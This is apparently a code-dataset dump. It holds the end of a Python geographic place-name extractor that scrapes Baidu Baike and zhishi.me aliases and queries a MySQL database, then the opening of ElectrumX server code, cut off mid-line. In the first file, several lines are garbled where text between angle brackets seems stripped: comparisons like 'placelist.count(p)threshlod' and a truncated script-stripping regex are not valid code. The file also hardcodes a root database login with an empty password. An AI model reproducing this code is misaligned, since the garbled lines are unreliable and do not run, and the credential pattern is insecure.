self.filter_ai_global(placelist, placelist_,placelist_fullname)\r\n\r\n def parseDoc_global(self,doc):\r\n t = time.time()\r\n nslist = self.tp.posseg(doc, ['ns'])\r\n logging.info('%d nslist:%s' % (time.time() - t, str(nslist)))\r\n return self.parsePlaces(nslist)\r\n\r\n def filter_ai_global(self,placelist,placelist_,placelist_fullname):\r\n placelist_sure = defaultdict(set)\r\n for p in placelist_fullname:\r\n placelist_sure[p['level']].add(p['name'])\r\n self.complete_place(placelist_sure, p)\r\n\r\n for p in placelist:\r\n # if(p['name']=='北仑区'):\r\n # print(placelist_sure)\r\n if p['name'] in placelist_sure[p['level']]:continue\r\n p2parent = self.place_index.get(p['pid'])\r\n #一种省直接对区级市,江苏常熟\r\n if p2parent==None:\r\n placelist_sure[p['level']].add(p['name'])\r\n continue\r\n if p2parent in placelist:\r\n placelist_sure[p['level']].add(p['name'])\r\n # placelist_sure[p2parent['level']].add(p2parent['name'])\r\n self.complete_place(placelist_sure,p)\r\n continue\r\n if placelist_.count(p2parent)>self.threshlod and placelist.count(p)threshlod and districtlist.count(d)threshlod and citylist.count(c)threshlod:\r\n provincelist_sure.add(p['name'])\r\n\r\n\r\n # logging.info(str(districtlist_sure))\r\n # logging.info(str(citylist_sure))\r\n # logging.info(str(provincelist_sure))\r\n\r\n return citylist_sure,districtlist_sure,provincelist_sure\r\n\r\n\r\n # 暂时没有国的\r\n def getPlace(self, s, complete=True):\r\n city, district, province,city_,province_ = None, None, None,None,None\r\n if (self.city_dict.get(s)):\r\n # print('find city ', self.city_dict.get(s, set()))\r\n # print(self.city_index.get(self.city_dict.get(s, set())['id']))\r\n samename=self.city_dict.get(s)\r\n for c in samename:\r\n city = self.city_index.get(c['id'])\r\n # 补充上层地区\r\n if complete and city:\r\n province_ = 
self.province_index.get(city['pid'])\r\n\r\n if (self.district_dict.get(s)):\r\n # print('find district ', self.district_dict.get(s, set()))\r\n # print(self.district_index.get(self.district_dict.get(s, set())['id']))\r\n district = self.district_index.get(self.district_dict.get(s, set())['id'])\r\n if complete and district:\r\n city_ = self.city_index.get(district['pid'])\r\n\r\n province_ = self.province_index.get(city_['pid'])\r\n\r\n\r\n if (self.province_dict.get(s)):\r\n # print('find province ', self.province_dict.get(s, set()))\r\n # print(self.province_index.get(self.province_dict.get(s, set())['id']))\r\n province = self.province_index.get(self.province_dict.get(s, set())['id'])\r\n return city, district, province,city_,province_\r\n\r\n def test(self):\r\n # print(self.get_sim('本拉登'))\r\n s = '习近平在重庆调研时强调,创新、协调、绿色、开放、共享的发展理念,一带一路是在深刻总结国内外发展经验教训、分析国内外发展大势的基础上形成的,凝聚着对经济社会发展规律的深入思考,体现了“十三五”乃至更长时期我国的发展思路、发展方向、发展着力点。'\r\n s = '宝塔区冯庄乡康坪村是中国新民主主义青年团第一个农村团支部的诞生地。从2016年开始,康坪村办起了干部教育培训基地,同时农耕体验、采摘观光、窑洞民宿等多种旅游项目齐头并进。村里2015年建档立卡的30多户贫困户,去年已全部脱贫。'\r\n s = '5月的延安山青天蓝,游人如织。刚刚过去的“五一”假期,延安共接待游客255万多人次,同比增长29.6%。近年来,在红色旅游快速发展的带动下,延安依靠独特的历史人文和自然资源魅力,创建全域旅游城市,旅游产业成为延安打赢脱贫攻坚战的强劲推动力。\\\r\n  黄河沿岸的千山万壑造就了延安市延川县雄奇的自然景观,位于县城以南48公里的乾坤湾镇,拥有红军东征革命纪念馆、黄河乾坤湾、伏羲码头等旅游资源。\\\r\n  62岁的冯永泽经历过两次手术,身体一直不太好,曾长期靠低保和种枣树维持生活,4个子女都在外地打工,没法儿照顾老两口。\\\r\n  2015年,认定为贫困户的冯永泽被招聘到乾坤湾镇黄河蛇曲国家地质公园做保洁员,每个月有1260元工资。老伴则用政府补助的5万元,在村里开起了农家乐,老两口每年的收入将近3万元。家里脱了贫,冯永泽越来越开朗。\\\r\n  宝塔区冯庄乡康坪村是中国新民主主义青年团第一个农村团支部的诞生地。从2016年开始,康坪村办起了干部教育培训基地,同时农耕体验、采摘观光、窑洞民宿等多种旅游项目齐头并进。村里2015年建档立卡的30多户贫困户,去年已全部脱贫。\\\r\n  2018年,康坪村引进专业的旅游公司,将村民闲置的窑洞打造成民宿,每孔窑洞每个月由企业支付200元,闲置窑洞变成了“乡村致富宝”。去年村里的民宿共接待游客3.2万人次。\\\r\n  为了接待游客,村里把几孔窑洞改为能同时容纳100多人就餐的特色餐厅。去年,34岁的黄燕娃被招聘在餐厅厨房工作,每月工资2600元。\\\r\n  黄燕娃说,村里发展民宿,把自己家的4孔窑洞出租了,随后又在餐厅找到工作。“去年还啥也不会做呢,现在有了做小吃的手艺,今后也不担心生活出路了。”\\\r\n  洛川县是我国苹果主产区之一,还是著名的洛川会议旧址所在地。临近洛川会议纪念馆的阿寺村,在苹果种植业之外,依托红色旅游资源,发展特色农业休闲观光旅游,让群众脱贫致富又多一个途径。\\\r\n  作为陕北苹果的发源地,永乡镇阿寺村如今除了有好吃的苹果,还变得更加好看好玩,村里墙上的农民画、街口的铜像都是以苹果为主题,每条小巷也都以不同的苹果品种命名,颇具特色。\\\r\n  村里的主干道两边有店铺���业,接待各地游客。村民李磊磊的小超市就开在这条街上。26岁的他几年前不幸因车祸致残而失去了劳动能力。结婚不久、家里没什么积蓄的李磊磊,为了治疗费用,东拼西凑借了二十几万元,生活陷入困境。\\\r\n  2017年被列为建档立卡贫困户后,李磊磊用政府发放的产业补助6000元,在村里开了个小超市。他通过在网上进货,小超市有了100多种日用品,也在一年的时间里为家里带来1万多元的纯收入。现在,李磊磊靠自食其力走出了阴影。\\\r\n  “去年一年村里的旅游人次保守估计有10万,我们目前还在争创4A级景区,希望能吸引更多游客。”阿寺村驻村干部田林说。\\\r\n  据延安市旅游局统计,2018年全市接待游客6343.98万人次,旅游综合收入410.7亿元。'\r\n# s='宝塔区冯庄乡康坪村是中国新民主主义青年团第一个农村团支部的诞生地。从2016年开始,康坪村办起了干部教育培训基地,同时农耕体验、采摘观光、窑洞民宿等多种旅游项目齐头并进。村里2015年建档立卡的30多户贫困户,去年已全部脱贫。\\\r\n#   2018年,康坪村引进专业的旅游公司,将村民闲置的窑洞打造成民宿,每孔窑洞每个月由企业支付200元,闲置窑洞变成了“乡村致富宝”。去年村里的民宿共接待游客3.2万人次。\\\r\n#   为了接待游客,村里把几孔窑洞改为能同时容纳100多人就餐的特色餐厅。去年,34岁的黄燕娃被招聘在餐厅厨房工作,每月工资2600元。\\\r\n#   黄燕娃说,村里发展民宿,把自己家的4孔窑洞出租了,随后又在餐厅找到工作。“去年还啥也不会做呢,现在有了做小吃的手艺,今后也不担心生活出路了。”\\\r\n#   洛川县是我国苹果主产区之一,还是著名的洛川会议旧址所在地。临近洛川会议纪念馆的阿寺村,在苹果种植业之外,依托红色旅游资源,发展特色农业休闲观光旅游,让群众脱贫致富又多一个途径。\\\r\n#   作为陕北苹果的发源地,永乡镇阿寺村如今除了有好吃的苹果,还变得更加好看好玩,村里墙上的农民画、街口的铜像都是以苹果为主题,每条小巷也都以不同的苹果品种命名,颇具特色。\\\r\n#   村里的主干道两边有店铺营业,接待各地游客。'\r\n# print(self.parseDoc(s))\r\n# s='新华社印务网“凹凸设计奖”报名入口开通诚邀全球设计师 中国财富网讯“凹凸设计奖”将于3月17日-20日在广东佛山举办的第十六届中博会国际家具展、中国(广东)国际定制家具博览会上发布。“凹凸设计奖”致力\\\r\n# 于搭建开源的全球设计师共享平台,通过设计驱动、产业融合、模式创新,实现全球原创设计智力资源的共享机制,让设计、生产、消费资源全球共享。“凹凸”是中国文字,也是世界符号。“凹凸”既蕴含着中国传统文化,又体现出了\\\r\n# 现代设计元素。“凹凸”师法自然,融汇着东方智慧和匠心精神,所以“凹凸”是无极限的。“凹凸设计奖”将采取面向社会公开发布和通过大赛组委会特邀导师进行定向提名推荐的双重方式共同邀请参赛者。   “凹凸设计奖”的参\\\r\n# 选对象为致力于“美好生活”的九大领域的全球设计师。评选工作由中华全国工商业联合会家具装饰业商会作为主要发起人,成立评奖委员会。首届评奖委员会由40位推荐导师、20位初审评委和5位终审评委共同构成。“凹凸设计奖”首\\\r\n# 创“导师制”赛制规则,大赛组委会将邀请40位世界著名设计师担任大赛导师,每位导师可推荐5位设计师。由导师对参赛者进行甄选、创意辅导、参赛指导,以及未来导师工作室的设计定向培养签约合作等。该赛制模式将为“凹凸设计\\\r\n# 
奖”进行赛事质量把关及后续市场推广合作产生可持续的商业动能。导师们将在第十六届中博会国际家具展开幕仪式上共同宣言,并将受邀签约入驻“国际贸易设计中心(家居)”,为促进服务贸易创新设计领域的国际合作走出一条创新\\\r\n# 之路。2018年11月,首个面向家居行业设计服务的国际贸易平台落户上海普陀区月星家居茂。图为国际贸易设计中心(家居)揭牌仪式附:1.“凹凸设计奖”的申报条件申报对象为全球设计师。申报作品必须是原创作品,其形式包括概念\\\r\n# 设计、产品和创新服务,作品版权所有人可为最终获得知识产权的个人、组织、团队或公司。还未申请取得“知识产权”,但确保符合原创设计的作品也可申报。申报作品分为家具设计、室内设计、软装陈设、家居饰品、智能科技、灯光\\\r\n# 设计、艺术装置、展览展示、材料应用九大类,寓意“打开美好生活的九种方式”。2.凹凸设计奖”的申报流程申报渠道:(1)组委会特邀导师推荐 (2)大赛官网:www.aotuaward.com申报作品展示日期:2019年3月17日-20日展示地\\\r\n# 点:第十六届中博会国际家具展中国(广东)国际定制家具博览会申报截止日期:2019年6月30日。申报入口:http://aotuaward.yuexing.com(申报为在线申报,按申报表条件和要求填写及上传资料。)评审委员会依据本办法规定的申\\\r\n# 报条件和要求对申报的作品进行初评,并将初审结果告知申报人或申报单位,并进入终评。评审结果在2019年7月公布。'\r\n #两个普陀区的问题,一个在舟山,一个在上海\r\n # print(self.parseDoc_global('常熟市'))\r\n rows=self.query_city_name('SELECT DISTINCT file_uuid,txt FROM e20190304 GROUP BY file_uuid,txt LIMIT 10,20')\r\n for row in rows:\r\n title=row[0]\r\n detail=row[1]\r\n logging.info(str(title)+detail)\r\n t=time.time()\r\n pl=self.parseDoc_global(str(title)+detail)\r\n logging.info('%s ' % str(pl))\r\n logging.info('cost:%d' %(time.time()-t))\r\n logging.info('-'*15)\r\n\r\n\r\n def connect_db(self):\r\n return pymysql.connect(host='192.168.1.101',\r\n port=3306,\r\n user='root',\r\n password='',\r\n database='xinhua',\r\n charset='utf8')\r\n\r\n def query_city_name(self, sql_str):\r\n logging.info(sql_str)\r\n con = self.connect_db()\r\n cur = con.cursor()\r\n cur.execute(sql_str)\r\n rows = cur.fetchall()\r\n cur.close()\r\n con.close()\r\n return rows\r\n\r\n def __init__(self,threshold=1):\r\n\r\n load_file = open('./mod/city_dict.bin', 'rb')\r\n self.city_dict = pickle.load(load_file)\r\n load_file = open('./mod/city_index.bin', 'rb')\r\n self.city_index = pickle.load(load_file)\r\n logging.info('city count %d,city name count:%s' % (len(self.city_index), len(self.city_dict)))\r\n\r\n load_file = open('./mod/district_dict.bin', 'rb')\r\n self.district_dict = pickle.load(load_file)\r\n load_file = open('./mod/district_index.bin', 'rb')\r\n self.district_index = pickle.load(load_file)\r\n logging.info('district count %d,district name count:%s' % (len(self.district_index), len(self.district_dict)))\r\n\r\n load_file = open('./mod/province_dict.bin', 'rb')\r\n self.province_dict = pickle.load(load_file)\r\n load_file = open('./mod/province_index.bin', 'rb')\r\n self.province_index = pickle.load(load_file)\r\n logging.info('province count %d,province name count:%s' % (len(self.province_index), len(self.province_dict)))\r\n\r\n load_file = open('./mod/place_dict.bin', 'rb')\r\n self.place_dict = pickle.load(load_file)\r\n load_file = open('./mod/place_index.bin', 'rb')\r\n self.place_index = pickle.load(load_file)\r\n #还要去掉一些错词\r\n with open('./resources/place_remove.txt','r',encoding='utf-8') as f:\r\n for line in f.readlines():\r\n line=line.strip()\r\n self.place_dict.pop(line)\r\n\r\n logging.info('place count %d,place name count:%s' % (len(self.place_index), len(self.place_dict)))\r\n self.threshlod=threshold\r\n self.tp = textProcess.TextProcess()\r\n\r\n load_file = open('./mod/baidu_place.bin', 'rb')\r\n self.baidu_place=pickle.load(load_file)\r\n logging.info('baidu place count %d' % (len(self.baidu_place)))\r\n\r\n self.zhishi_place=dict()\r\n\r\n\r\n def genCity(self, cities):\r\n #字典模式下,如果出现重复就没法处理了,怎么办呢?\r\n cityName_all_dict = defaultdict(list)\r\n cityIndex = dict()\r\n #亚洲\t1\t-1\t1\tAsia\r\n #阿富汗\t0040000000\t1\t2\tAfghanistan\r\n #巴达赫尚省\t0040100000\t0040000000\t3\tBadakhshan\r\n for num,city in enumerate(cities):\r\n cityName = city[0]\r\n logging.info('%d,%s' % 
(num,cityName))\r\n cityEName=city[4] if len(city)>4 else None\r\n aliasCityName = self.get_sim(cityName)\r\n # if self.baidu_place.get(cityName):\r\n # baiduCityNames=self.parseHtml(cityName,self.baidu_place.get(cityName))\r\n # else:\r\n baiduCityNames=self.getBaiduSame(cityName)\r\n if len(baiduCityNames)==0:\r\n baiduCityNames=self.getZhishi(cityName)\r\n\r\n cityName_all = set([cityName,cityEName]).union(set(aliasCityName)).union(set(baiduCityNames))\r\n # if(cityEName==None):\r\n # print(cityName_all)\r\n #这里是全的\r\n cityIndex[city[1]] = {'name': city[0], 'pid': city[2],'level':city[3]}\r\n\r\n if (cityName[-1] in ['市', '县', '省']):\r\n\r\n cityName_all.add(cityName[:-1])\r\n # cityName_all_dict[city[1][:-1]].append({'id': city[0], 'pid': city[2]})\r\n\r\n for c in cityName_all :\r\n if c !=None:\r\n cityName_all_dict[c].append({'id': city[1], 'pid': city[2]})\r\n print('city count %d,all_city count %d' % (len(cityIndex), len(cityName_all_dict)))\r\n return cityName_all_dict, cityIndex\r\n\r\n def readfile(self):\r\n places=[]\r\n with open('./resources/regions.txt','r',encoding='utf-8') as f:\r\n for line in f.readlines():\r\n line=line.strip()\r\n item=line.split('\\t')\r\n if item=='':break\r\n places.append(item)\r\n return places\r\n\r\n def gen(self):\r\n places=self.readfile()\r\n place_dict,place_index=self.genCity(places)\r\n fou = open('./mod/place_dict.bin', 'wb')\r\n pickle.dump(place_dict, fou)\r\n fou.close()\r\n fou = open('./mod/place_index.bin', 'wb')\r\n pickle.dump(place_index, fou)\r\n fou.close()\r\n fou = open('./mod/baidu_place.bin', 'wb')\r\n pickle.dump(self.baidu_place, fou)\r\n fou.close()\r\n\r\n # cities = self.query_city_name('SELECT CityID,CityName,ProvinceID FROM s_city')\r\n # city_dict, city_index = self.genCity(cities)\r\n # s_districtes = self.query_city_name('SELECT DistrictID,DistrictName,CityID FROM s_district')\r\n # district_dict, district_index = self.genCity(s_districtes)\r\n # s_provinces = self.query_city_name('SELECT ProvinceID,ProvinceName,Abbreviation FROM s_province')\r\n # province_dict, province_index = self.genCity(s_provinces)\r\n #\r\n # fou = open('./mod/city_dict.bin', 'wb')\r\n # pickle.dump(city_dict, fou)\r\n # fou.close()\r\n # fou = open('./mod/city_index.bin', 'wb')\r\n # pickle.dump(city_index, fou)\r\n # fou.close()\r\n # fou = open('./mod/district_dict.bin', 'wb')\r\n # pickle.dump(district_dict, fou)\r\n # fou.close()\r\n # fou = open('./mod/district_index.bin', 'wb')\r\n # pickle.dump(district_index, fou)\r\n # fou.close()\r\n # fou = open('./mod/province_dict.bin', 'wb')\r\n # pickle.dump(province_dict, fou)\r\n # fou.close()\r\n # fou = open('./mod/province_index.bin', 'wb')\r\n # pickle.dump(province_index, fou)\r\n # fou.close()\r\n\r\n def getBaiduSame(self,place):\r\n if self.baidu_place.get(place):\r\n # logging.info('find %s from baidu_place' % place )\r\n return self.parseHtml(place, self.baidu_place.get(place))\r\n\r\n\r\n url='https://baike.baidu.com/item/'\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\r\n 'Accept': 'text / html, application / xhtml + xml, application / xml;q = 0.9,image/webp, * / *;q = 0.8',\r\n 'Accept-Language': 'zh-CN, zh;q = 0.9'\r\n }\r\n try:\r\n wb_data = requests.get(url+place,headers=headers,allow_redirects=True)\r\n wb_data.encoding='utf-8'\r\n except:\r\n return []\r\n content = wb_data.text\r\n return self.parseHtml(place,content)\r\n\r\n def 
parseHtml(self,place,content):\r\n\r\n clear = re.compile(']*?>[\\\\s\\\\S]*?<\\\\/script>', re.I)#re.compile('<\\s*script[^>]*>[^<]*<\\s*/\\s*script\\s*>', re.I)\r\n\r\n content = clear.sub(\"\", content)\r\n # content=str(content,encoding='utf-8')\r\n # logging.info(content)\r\n # self.save_db(place,content)\r\n self.baidu_place[place]=content\r\n\r\n soup = BeautifulSoup(content, 'html.parser')\r\n [script.extract() for script in soup.findAll('script')]\r\n # s=soup.text\r\n\r\n try:\r\n title_node = soup.find('dd', class_='lemmaWgt-lemmaTitle-title').find('h1').text\r\n except:\r\n return []\r\n '''\r\n
别    名
\r\n        
\r\n            三袁故里、百湖之县\r\n        
\r\n '''\r\n def parse_alias(alias):\r\n alias=self.tp.remove_noisy(alias)\r\n if alias[-1]=='等': alias=alias[:-1]\r\n alias=re.sub(r'[%s|\\/,;]' % punctuation,'、',alias)\r\n return alias.split('、')\r\n samenames =[title_node]# soup.find('dt', class_='basicInfo-item name', text='中文名称').find_next('dd').text.strip().split('、')\r\n try:\r\n alias=soup.find('dt', class_='basicInfo-item name', text='别    名').find_next('dd').text.strip()\r\n # alias\r\n samenames.extend(parse_alias(alias))\r\n except:\r\n None\r\n try:\r\n alias=soup.find('dt', class_='basicInfo-item name', text='简    称').find_next('dd').text.strip()\r\n samenames.extend(alias.split('、'))\r\n except:\r\n None\r\n # samenames=samenames1.extend(samenames2).extend(samenames3)\r\n # logging.info(samenames)\r\n return samenames\r\n '''\r\n 失败,有字符集问题\r\n '''\r\n def save_db(self,place,content):\r\n logging.info(content)\r\n con = self.connect_db()\r\n con.autocommit(True)\r\n cur = con.cursor()\r\n cur.execute(\"insert into baidu_place values(%s,%s)\",(place,content))\r\n cur.close()\r\n con.close()\r\n return\r\n\r\n def getZhishi(self,place):\r\n if self.zhishi_place.get(place):\r\n logging.info('find %s from zhishi_place' % place )\r\n return self.baidu_place.get(place)\r\n\r\n\r\n url='http://zhishi.me/api/entity/%s?property=infobox'\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\r\n 'Accept': 'text / html, application / xhtml + xml, application / xml;q = 0.9,image/webp, * / *;q = 0.8',\r\n 'Accept-Language': 'zh-CN, zh;q = 0.9'\r\n }\r\n try:\r\n wb_data = requests.get(url % place,headers=headers,allow_redirects=True)\r\n wb_data.encoding='utf-8'\r\n content = wb_data.json()\r\n logging.info(str(content))\r\n ret1 = jsonpath.jsonpath(content, \"$..'别称:'\")\r\n logging.info(str(ret1[0]))\r\n if ret1:\r\n return ret1[0][0].split('、')\r\n\r\n except:\r\n return []\r\n '''\r\n 这个基本不可用\r\n '''\r\n def getXLORE(self,place):\r\n url ='http://api.xlore.org/query?instances='\r\n url='http://api.xlore.org/relations?instance=%s&relation=%s'\r\n try:\r\n wb_data = requests.get(url % ('任正非','职务'),allow_redirects=True)\r\n wb_data.encoding='utf-8'\r\n content = wb_data.json()\r\n logging.info(str(content))\r\n return content\r\n\r\n except:\r\n return []\r\nif __name__=='__main__':\r\n g = GeoKG()\r\n # g.gen()\r\n # s='习近平在重庆调研时强调,创新、协调、绿色、开放、共享的发展理念,一带一路是在深刻总结国内外发展经验教训、分析国内外发展大势的基础上形成的,凝聚着对经济社会发展规律的深入思考,体现了“十三五”乃至更长时期我国的发展思路、发展方向、发展着力点。'\r\n # g.parseDoc(s)\r\n # g.test()\r\n # g.getBaiduSame('连云港')\r\n print(g.getXLORE('北京故宫博物院'))","sub_path":"global_geo_test.py","file_name":"global_geo_test.py","file_ext":"py","file_size_in_byte":31717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"260112504","text":"# Copyright (c) 2016, Neil Booth\n#\n# All rights reserved.\n#\n# See the file \"LICENCE\" for information about the copyright\n# and warranty status of this software.\n\n'''Classes for local RPC server and remote client TCP/SSL servers.'''\n\n\nimport asyncio\nimport codecs\nimport json\nimport ssl\nimport time\nimport traceback\nfrom collections import namedtuple\nfrom functools import partial\n\nfrom lib.hash import sha256, double_sha256, hash_to_str, hex_str_to_hash\nfrom lib.jsonrpc import JSONRPC, json_notification_payload\nfrom lib.util import LoggedClass\nfrom server.block_processor import BlockProcessor\nfrom server.daemon import DaemonError\nfrom server.irc import 
IRC\nfrom server.version import VERSION\n\n\nclass BlockServer(BlockProcessor):\n '''Like BlockProcessor but also has a server manager and starts\n servers when caught up.'''\n\n def __init__(self, env):\n super().__init__(env)\n self.server_mgr = ServerManager(self, env)\n self.bs_caught_up = False\n\n async def caught_up(self, mempool_hashes):\n await super().caught_up(mempool_hashes)\n if not self.bs_caught_up:\n await self.server_mgr.start_servers()\n self.bs_caught_up = True\n self.server_mgr.notify(self.height, self.touched)\n\n def stop(self):\n '''Close the listening servers.'''\n self.server_mgr.stop()\n\n\nclass ServerManager(LoggedClass):\n '''Manages the servers.'''\n\n AsyncTask = namedtuple('AsyncTask', 'session job')\n\n def __init__(self, bp, env):\n super().__init__()\n self.bp = bp\n self.env = env\n self.servers = []\n self.irc = IRC(env)\n self.sessions = set()\n self.tasks = asyncio.Queue()\n self.current_task = None\n\n async def start_server(self, kind, *args, **kw_args):\n loop = asyncio.get_event_loop()\n protocol_class = LocalRPC if kind == 'RPC' else ElectrumX\n protocol = partial(protocol_class, self, self.bp, self.env, kind)\n server = loop.create_server(protocol, *args, **kw_args)\n\n host, port = args[:2]\n try:\n self.servers.append(await server)\n except asyncio.CancelledError:\n raise\n except Exception as e:\n self.logger.error('{} server failed to listen on {}:{:d} :{}'\n .format(kind, host, port, e))\n else:\n self.logger.info('{} server listening on {}:{:d}'\n .format(kind, host, port))\n\n async def start_servers(self):\n '''Connect to IRC and start listening for incoming connections.\n\n Only connect to IRC if enabled. Start listening on RCP, TCP\n and SSL ports only if the port wasn pecified.\n '''\n env = self.env\n\n if env.rpc_port is not None:\n await self.start_server('RPC', 'localhost', env.rpc_port)\n\n if env.tcp_port is not None:\n await self.start_server('TCP', env.host, env.tcp_port)\n\n if env.ssl_port is not None:\n # FIXME: update if we want to require Python >= 3.5.3\n sslc = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n sslc.load_cert_chain(env.ssl_certfile, keyfile=env.ssl_keyfile)\n await self.start_server('SSL', env.host, env.ssl_port, ssl=sslc)\n\n asyncio.ensure_future(self.run_tasks())\n\n if env.irc:\n self.logger.info('starting IRC coroutine')\n asyncio.ensure_future(self.irc.start())\n else:\n self.logger.info('IRC disabled')\n\n def notify(self, height, touched):\n '''Notify sessions about height changes and touched addresses.'''\n sessions = [session for session in self.sessions\n if isinstance(session, ElectrumX)]\n ElectrumX.notify(sessions, height, touched)\n\n def stop(self):\n '''Close the listening servers.'''\n for server in self.servers:\n server.close()\n\n def add_session(self, session):\n assert session not in self.sessions\n self.sessions.add(session)\n\n def remove_session(self, session):\n self.sessions.remove(session)\n if self.current_task and session == self.current_task.session:\n self.logger.info('cancelling running task')\n self.current_task.job.cancel()\n\n def add_task(self, session, job):\n assert session in self.sessions\n task = asyncio.ensure_future(job)\n self.tasks.put_nowait(self.AsyncTask(session, task))\n\n async def run_tasks(self):\n '''Asynchronously run through the task queue.'''\n while True:\n task = await self.tasks.get()\n try:\n if task.session in self.sessions:\n self.current_task = task\n await task.job\n else:\n task.job.cancel()\n except asyncio.CancelledError:\n 
self.logger.info('cancelled task noted')\n except Exception:\n # Getting here should probably be considered a bug and fixed\n traceback.print_exc()\n finally:\n self.current_task = None\n\n def irc_peers(self):\n return self.irc.peers\n\n def session_count(self):\n return len(self.sessions)\n\n def info(self):\n '''Returned in the RPC 'getinfo' call.'''\n address_count = sum(len(session.hash168s)\n for session in self.sessions\n if isinstance(session, ElectrumX))\n return {\n 'blocks': self.bp.height,\n 'peers': len(self.irc_peers()),\n 'sessions': self.session_count(),\n 'watched': address_count,\n 'cached': 0,\n }\n\n def sessions_info(self):\n '''Returned to the RPC 'sessions' call.'''\n now = time.time()\n return [(session.kind,\n session.peername(),\n len(session.hash168s),\n 'RPC' if isinstance(session, LocalRPC) else session.client,\n session.recv_count, session.recv_size,\n session.send_count, session.send_size,\n session.error_count,\n now - session.start)\n for session in self.sessions]\n\n\nclass Session(JSONRPC):\n '''Base class of ElectrumX JSON session protocols.'''\n\n def __init__(self, manager, bp, env, kind):\n super().__init__()\n self.manager = manager\n self.bp = bp\n self.env = env\n self.daemon = bp.daemon\n self.coin = bp.coin\n self.kind = kind\n self.hash168s = set()\n self.client = 'unknown'\n\n def connection_made(self, transport):\n '''Handle an incoming client connection.'''\n super().connection_made(transport)\n self.logger.info('connection from {}'.format(self.peername()))\n self.manager.add_session(self)\n\n def connection_lost(self, exc):\n '''Handle client disconnection.'''\n super().connection_lost(exc)\n if self.error_count or self.send_size >= 250000:\n self.logger.info('{} disconnected. '\n 'Sent {:,d} bytes in {:,d} messages {:,d} errors'\n .format(self.peername(), self.send_size,\n self.send_count, self.error_count))\n self.manager.remove_session(self)\n\n def method_handler(self, method):\n '''Return the handler that will handle the RPC method.'''\n return self.handlers.get(method)\n\n def on_json_request(self, request):\n '''Queue the request for asynchronous handling.'''\n self.manager.add_task(self, self.handle_json_request(request))\n\n def peername(self):\n info = self.peer_info\n return 'unknown' if not info else '{}:{}'.format(info[0], info[1])\n\n def tx_hash_from_param(self, param):\n '''Raise an RPCError if the parameter is not a valid transaction\n hash.'''\n if isinstance(param, str) and len(param) == 64:\n try:\n bytes.fromhex(param)\n return param\n except ValueError:\n pass\n raise RPCError('parameter should be a transaction hash: {}'\n .format(param))\n\n def hash168_from_param(self, param):\n if isinstance(param, str):\n try:\n return self.coin.address_to_hash168(param)\n except:\n pass\n raise RPCError('parameter should be a valid address: {}'.format(param))\n\n def non_negative_integer_from_param(self, param):\n try:\n param = int(param)\n except ValueError:\n pass\n else:\n if param >= 0:\n return param\n\n raise RPCError('param should be a non-negative integer: {}'\n .format(param))\n\n def extract_hash168(self, params):\n if len(params) == 1:\n return self.hash168_from_param(params[0])\n raise RPCError('params should contain a single address: {}'\n .format(params))\n\n def extract_non_negative_integer(self, params):\n if len(params) == 1:\n return self.non_negative_integer_from_param(params[0])\n raise RPCError('params should contain a non-negative integer: {}'\n .format(params))\n\n def require_empty_params(self, params):\n 
if params:\n raise RPCError('params should be empty: {}'.format(params))\n\n\nclass ElectrumX(Session):\n '''A TCP server that handles incoming Electrum connections.'''\n\n def __init__(self, *args):\n super().__init__(*args)\n self.subscribe_headers = False\n self.subscribe_height = False\n self.notified_height = None\n rpcs = [\n ('blockchain',\n 'address.get_balance address.get_history address.get_mempool '\n 'address.get_proof address.listunspent address.subscribe '\n 'block.get_header block.get_chunk estimatefee headers.subscribe '\n 'numblocks.subscribe relayfee transaction.broadcast '\n 'transaction.get transaction.get_merkle utxo.get_address'),\n ('server',\n 'banner donation_address peers.subscribe version'),\n ]\n self.handlers = {'.'.join([prefix, suffix]):\n getattr(self, suffix.replace('.', '_'))\n for prefix, suffixes in rpcs\n for suffix in suffixes.split()}\n\n @classmethod\n def notify(cls, sessions, height, touched):\n headers_payload = height_payload = None\n\n for session in sessions:\n if height != session.notified_height:\n session.notified_height = height\n if session.subscribe_headers:\n if headers_payload is None:\n headers_payload = json_notification_payload(\n 'blockchain.headers.subscribe',\n (session.electrum_header(height), ),\n )\n session.send_json(headers_payload)\n\n if session.subscribe_height:\n if height_payload is None:\n height_payload = json_notification_payload(\n 'blockchain.numblocks.subscribe',\n (height, ),\n )\n session.send_json(height_payload)\n\n hash168_to_address = session.coin.hash168_to_address\n for hash168 in session.hash168s.intersection(touched):\n address = hash168_to_address(hash168)\n status = session.address_status(hash168)\n payload = json_notification_payload(\n 'blockchain.address.subscribe', (address, status))\n session.send_json(payload)\n\n def height(self):\n '''Return the block processor's current height.'''\n return self.bp.height\n\n def current_electrum_header(self):\n '''Used as response to a headers subscription request.'''\n return self.electrum_header(self.height())\n\n def electrum_header(self, height):\n '''Return the binary header at the given height.'''\n if not 0 <= height <= self.height():\n raise RPCError('height {:,d} out of range'.format(height))\n header = self.bp.read_headers(height, 1)\n return self.coin.electrum_header(header, height)\n\n def address_status(self, hash168):\n '''Returns status as 32 bytes.'''\n # Note history is ordered and mempool unordered in electrum-server\n # For mempool, height is -1 if unconfirmed txins, otherwise 0\n history = self.bp.get_history(hash168)\n mempool = self.bp.mempool_transactions(hash168)\n\n status = ''.join('{}:{:d}:'.format(hash_to_str(tx_hash), height)\n for tx_hash, height in history)\n status += ''.join('{}:{:d}:'.format(hex_hash, -unconfirmed)\n for hex_hash, tx_fee, unconfirmed in mempool)\n if status:\n return sha256(status.encode()).hex()\n return None\n\n async def tx_merkle(self, tx_hash, height):\n '''tx_hash is a hex string.'''\n hex_hashes = await self.daemon.block_hex_hashes(height, 1)\n block = await self.daemon.deserialised_block(hex_hashes[0])\n tx_hashes = block['tx']\n # This will throw if the tx_hash is bad\n pos = tx_hashes.index(tx_hash)\n\n idx = pos\n hashes = [hex_str_to_hash(txh) for txh in tx_hashes]\n merkle_branch = []\n while len(hashes) > 1:\n if len(hashes) & 1:\n hashes.append(hashes[-1])\n idx = idx - 1 if (idx & 1) else idx + 1\n merkle_branch.append(hash_to_str(hashes[idx]))\n idx //= 2\n hashes = [double_sha256(hashes[n] + 
